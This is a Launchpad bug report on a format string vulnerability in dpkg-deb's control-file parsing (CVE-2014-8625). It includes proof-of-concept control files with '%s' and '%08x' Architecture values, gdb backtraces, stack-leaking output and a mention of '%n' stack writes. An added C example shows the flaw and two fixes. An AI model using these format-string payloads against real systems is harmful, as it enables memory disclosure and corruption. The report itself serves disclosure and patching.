dpkg / dpkg-deb segfault -- possible format string bug/vuln?

Bug #1389135 reported by Joshua Rogers on 2014-11-04
Affects          Status         Importance   Assigned to   Milestone
dpkg (Debian)    Fix Released   Unknown
dpkg (Ubuntu)                   Low          Unassigned

Bug Description

When building a .deb file using dpkg-deb --build, if the 'control' file inside DEBIAN/ has a % in it, it will segfault.
Example of control file:

Package: backup
Architecture: el%sion:-1
Description: script

Here's a gdb backtrace:

(gdb) run --build ./
Starting program: /root/srcs/dpkg/dpkg-1.16.1.2ubuntu7.5/dpkg-deb/dpkg-deb --build ./
warning: no loadable sections found in added symbol-file system-supplied DSO at 0x7ffff7ffa000

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff763f061 in _IO_vfprintf_internal (s=<optimised out>, format=<optimised out>, ap=<optimised out>) at vfprintf.c:1630
1630 vfprintf.c: No such file or directory.
(gdb) bt
#0 0x00007ffff763f061 in _IO_vfprintf_internal (s=<optimised out>, format=<optimised out>, ap=<optimised out>) at vfprintf.c:1630
#1 0x00007ffff76670f2 in _IO_vsnprintf (
    string=0x7fffffffd560 "parsing file './/DEBIAN/control' near line 2 package 'backup:elel%sion:-1ion:-1':\n 'character `%' not allowed (only letters, digits and characters `-')' is not a valid architecture name: ",
    maxlen=<optimised out>, format=0x650c60 "parsing file './/DEBIAN/control' near line 2 package 'backup:el%sion:-1':\n '%s' is not a valid architecture name: %s", args=0x7fffffffd9a8) at vsnprintf.c:120
#2 0x00000000004175f2 in warningv (fmt=0x650c60 "parsing file './/DEBIAN/control' near line 2 package 'backup:el%sion:-1':\n '%s' is not a valid architecture name: %s", args=0x7fffffffd9a8) at ehandle.c:392
#3 0x0000000000423fa7 in parse_warn (ps=0x7fffffffddc0, fmt=0x44a680 "'%s' is not a valid architecture name: %s") at parsehelp.c:75
#4 0x000000000043b38c in f_architecture (pigp=0x7fffffffdbc0, pifp=0x7fffffffdc80, ps=0x7fffffffddc0, value=0x6651f0 "el%sion:-1", fip=0x448c40) at fields.c:189
#5 0x000000000041eb65 in pkg_parse_field (ps=0x7fffffffddc0, fs=0x7fffffffde00, parse_obj=0x7fffffffde40) at parse.c:142
#6 0x00000000004222e9 in parse_stanza (ps=0x7fffffffddc0, fs=0x7fffffffde00, parse_field=0x41e480 <pkg_parse_field>, parse_obj=0x7fffffffde40) at parse.c:478
#7 0x0000000000422843 in parsedb (filename=0x665120 ".//DEBIAN/control", flags=3, donep=0x7fffffffdea0) at parse.c:547
#8 0x0000000000404661 in check_new_pkg (dir=0x7fffffffe3e7 "./") at build.c:335
#9 0x0000000000405274 in do_build (argv=0x7fffffffe198) at build.c:436
#10 0x000000000040e566 in main (argc=3, argv=0x7fffffffe188) at main.c:206
#11 0x00007ffff761576d in __libc_start_main (main=0x40e37a <main>, argc=3, ubp_av=0x7fffffffe178, init=<optimised out>, fini=<optimised out>, rtld_fini=<optimised out>, stack_end=0x7fffffffe168) at libc-start.c:226
#12 0x00000000004025a9 in _start ()
(gdb) up 2
#2 0x00000000004175f2 in warningv (fmt=0x650c60 "parsing file './/DEBIAN/control' near line 2 package 'backup:el%sion:-1':\n '%s' is not a valid architecture name: %s", args=0x7fffffffd9a8) at ehandle.c:392
392 vsnprintf(buf, sizeof(buf), fmt, args);

Unsure if it's a vulnerability or not. If it is, could I get a CVE-ID?

Thanks

Joshua Rogers (megamansec) wrote :

Yeah, just double checked and it does seem to be a format string vulnerability.

# cat DEBIAN/control
Package: backup
Architecture: %s
Description: script
0 0j 11:13:14 (root@limehost) /var/tmp/ok # ~/srcs/dpkg/dpkg-1.16.1.2ubuntu7.5/dpkg-deb/dpkg-deb --build ./
Segmentation fault

Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

information type: Private Security → Public
Joshua Rogers (megamansec) wrote :

I think that this is a security bug.

If you make the 'control' file have

Architecture: %08x.%08x.%08x.%08x.%08x

and run --build, it will print five parameters from the stack.

# ./dpkg-deb --build /var/tmp/ok/
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 2 package 'backup:016b0150.00449f58.00000001.00000001.00000018':
 '�D' is not a valid architecture name: %08x.%08x.%08x.%08x.%08x
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 4 package 'backup:00449077.00449af0.00000001.00000001.01bb5790':
 missing maintainer
dpkg-deb: error: parsing file '/var/tmp/ok//DEBIAN/control' near line 4 package 'backup:00449082.00449af0.00000001.00000001.01bb5790':
 missing version

This can also be used to overwrite/rewrite the stack, using %n, too.

Joshua Rogers (megamansec) wrote :

I don't have the time/skill to try, but I'm guessing that if you can somehow actually build the package with that set as the architecture, unpacking the .deb file will also be vulnerable, which would definitely be a security-related bug.

My guess is that it _does_ exist in the unpacking phase too, since the bug seems to be triggered in lib/dpkg/parsehelp.c.

Joshua Rogers (megamansec) wrote :

Yep, I'm right.

control file:

Package: backup
Architecture: %08x.%08x.%08x.%08x.%08x\n
Description: Stuff
maintainer: Joshua Rogers
version: 1

 # dpkg-deb/dpkg-deb --build /var/tmp/ok/
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 2 package 'backup:015fd150.00449f58.00000001.00000001.0000001a\n':
 '�D' is not a valid architecture name: %08x.%08x.%08x.%08x.%08x\n
dpkg-deb: warning: ignoring 1 warning about the control file(s)

dpkg-deb: building package `backup:%08x.%08x.%08x.%08x.%08x\n' in `/var/tmp/ok.deb'.

# dpkg -i ok.deb
dpkg: warning: parsing file '/var/lib/dpkg/available' near line 11413 package 'backup:017a1e00.00431828.00000001.00000001.0000001c\n':
 '%08x.%08x.%08x.%08x.%08x\n
Version: 1
Size: 514
Description: Stuff
[....]

(full: http://pastebin.com/qetcDngk )

Unsure if signing of the .deb files happens before or after the parsing of the file -- AKA whether or not a MITM attack could be used, if the listing of architecture is done before or after checking of the signature.
I won't be testing that though.

information type: Public → Public Security
Changed in dpkg (Debian):
status: Unknown → New
Salvatore Bonaccorso (carnil) wrote :

Hi

The correct CVE ID for this should be CVE-2014-8625, see [1].

 [1] https://marc.info/?l=oss-security&m=141532206321706&w=2

Joshua Rogers (megamansec) wrote :

Fixed, my bad..

sergiomb (sergio-sergiomb) wrote :

Hi,
Let me know when we have a dpkg release with this bug fixed (we don't have it yet, do we?), so I can downstream it on Fedora.
Thanks,

Joshua Rogers (megamansec) wrote :

Just for reference: the vulnerable function is parse_error_msg([..]), not warningv([..]).

I've attached the patch that the maintainer has recommended for the latest version of dpkg.
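The composition that fails in the backtrace above, and the two ways to close it, as an added C example written for this page (it is not dpkg's code; the function and buffer names are invented and the message text is modelled on the warning in the report). The position prefix that embeds the package/architecture field is spliced into the format string, so a field of `%08x.%08x.%08x.%08x.%08x` turns a two-argument format into one with seven directives. `escape_percent` doubles `%` in the field, which is what the attached patch's title describes; `parse_warn_safe` renders the caller's literal format first and then passes both the untrusted field and the rendered message as `%s` arguments, so untrusted bytes never reach a format string at all.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Count printf conversion directives in fmt ("%%" is a literal, not a directive). */
static int count_directives(const char *fmt)
{
    int n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') { p++; continue; }
        n++;
    }
    return n;
}

/* Vulnerable composition, mirroring the backtrace: the parse-position prefix,
 * which embeds the attacker-controlled package/architecture text, is spliced
 * into the format string that would later be handed to vsnprintf together with
 * arguments for count_directives(fmt) conversions only. Returned here rather
 * than formatted, because formatting it is undefined behaviour. */
static int build_fmt_vulnerable(char *fullfmt, size_t len,
                                const char *pkg_arch, const char *fmt)
{
    snprintf(fullfmt, len,
             "parsing file 'DEBIAN/control' near line 2 package '%s':\n %s",
             pkg_arch, fmt);
    return count_directives(fullfmt);
}

/* Fix 1 (what the patch title describes): escape '%' in the untrusted field
 * before it can reach a format string. Returns a malloc'd copy. */
static char *escape_percent(const char *s)
{
    size_t n = 0;
    for (const char *p = s; *p; p++)
        n += (*p == '%') ? 2 : 1;
    char *out = malloc(n + 1), *q = out;
    if (!out)
        return NULL;
    for (const char *p = s; *p; p++) {
        *q++ = *p;
        if (*p == '%')
            *q++ = '%';
    }
    *q = '\0';
    return out;
}

/* Fix 2 (more robust): never let untrusted bytes into a format string at all.
 * Render the caller's literal format first, then combine with a fixed format
 * in which the field and the rendered message are both plain %s arguments. */
static int parse_warn_safe(char *out, size_t outlen, const char *pkg_arch,
                           const char *fmt, ...)
{
    char msg[256];
    va_list args;
    va_start(args, fmt);
    vsnprintf(msg, sizeof msg, fmt, args);   /* fmt is a compile-time literal */
    va_end(args);
    return snprintf(out, outlen,
                    "parsing file 'DEBIAN/control' near line 2 package '%s':\n %s",
                    pkg_arch, msg);
}

int main(void)
{
    /* Constructed input, taken from the Architecture field in the report. */
    const char *arch = "%08x.%08x.%08x.%08x.%08x";
    const char *fmt = "'%s' is not a valid architecture name: %s";
    char full[512], out[512];

    printf("caller supplied arguments for %d directives\n", count_directives(fmt));
    printf("vulnerable composed format would consume %d\n",
           build_fmt_vulnerable(full, sizeof full, arch, fmt));

    char *esc = escape_percent(arch);
    printf("escaped field: %s (directives: %d)\n", esc, count_directives(esc));
    free(esc);

    parse_warn_safe(out, sizeof out, arch, fmt, arch,
                    "character `%' not allowed (only letters, digits and characters `-')");
    fputs(out, stdout);
    fputc('\n', stdout);
    return 0;
}
```

The vulnerable format is only composed and counted here, never passed to vsnprintf; doing so with that field reads five extra stack words (the `%08x` output in the comments above) and, with `%s` or `%n`, dereferences or writes through whatever is there, which is the SIGSEGV in the backtrace. The escaping fix still leaves the field inside a format string and relies on every caller remembering to escape; the second form removes the bug class, since the only format strings that reach vsnprintf are literals.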

The attachment "0001-libdpkg-Escape-package-and-architecture-on-control-f.patch" seems to be a patch. If it isn't, please remove the "patch" flag from the attachment, remove the "patch" tag, and if you are a member of the ~ubuntu-reviewers, unsubscribe the team.

[This is an automated message performed by a Launchpad user owned by ~brian-murray, for any issues please contact him.]

tags: added: patch
Changed in dpkg (Ubuntu):
status: New → Triaged
importance: Undecided → Medium
Changed in dpkg (Debian):
status: New → Fix Committed
Changed in dpkg (Ubuntu):
importance: Medium → Low
Changed in dpkg (Debian):
status: Fix Committed → Fix Released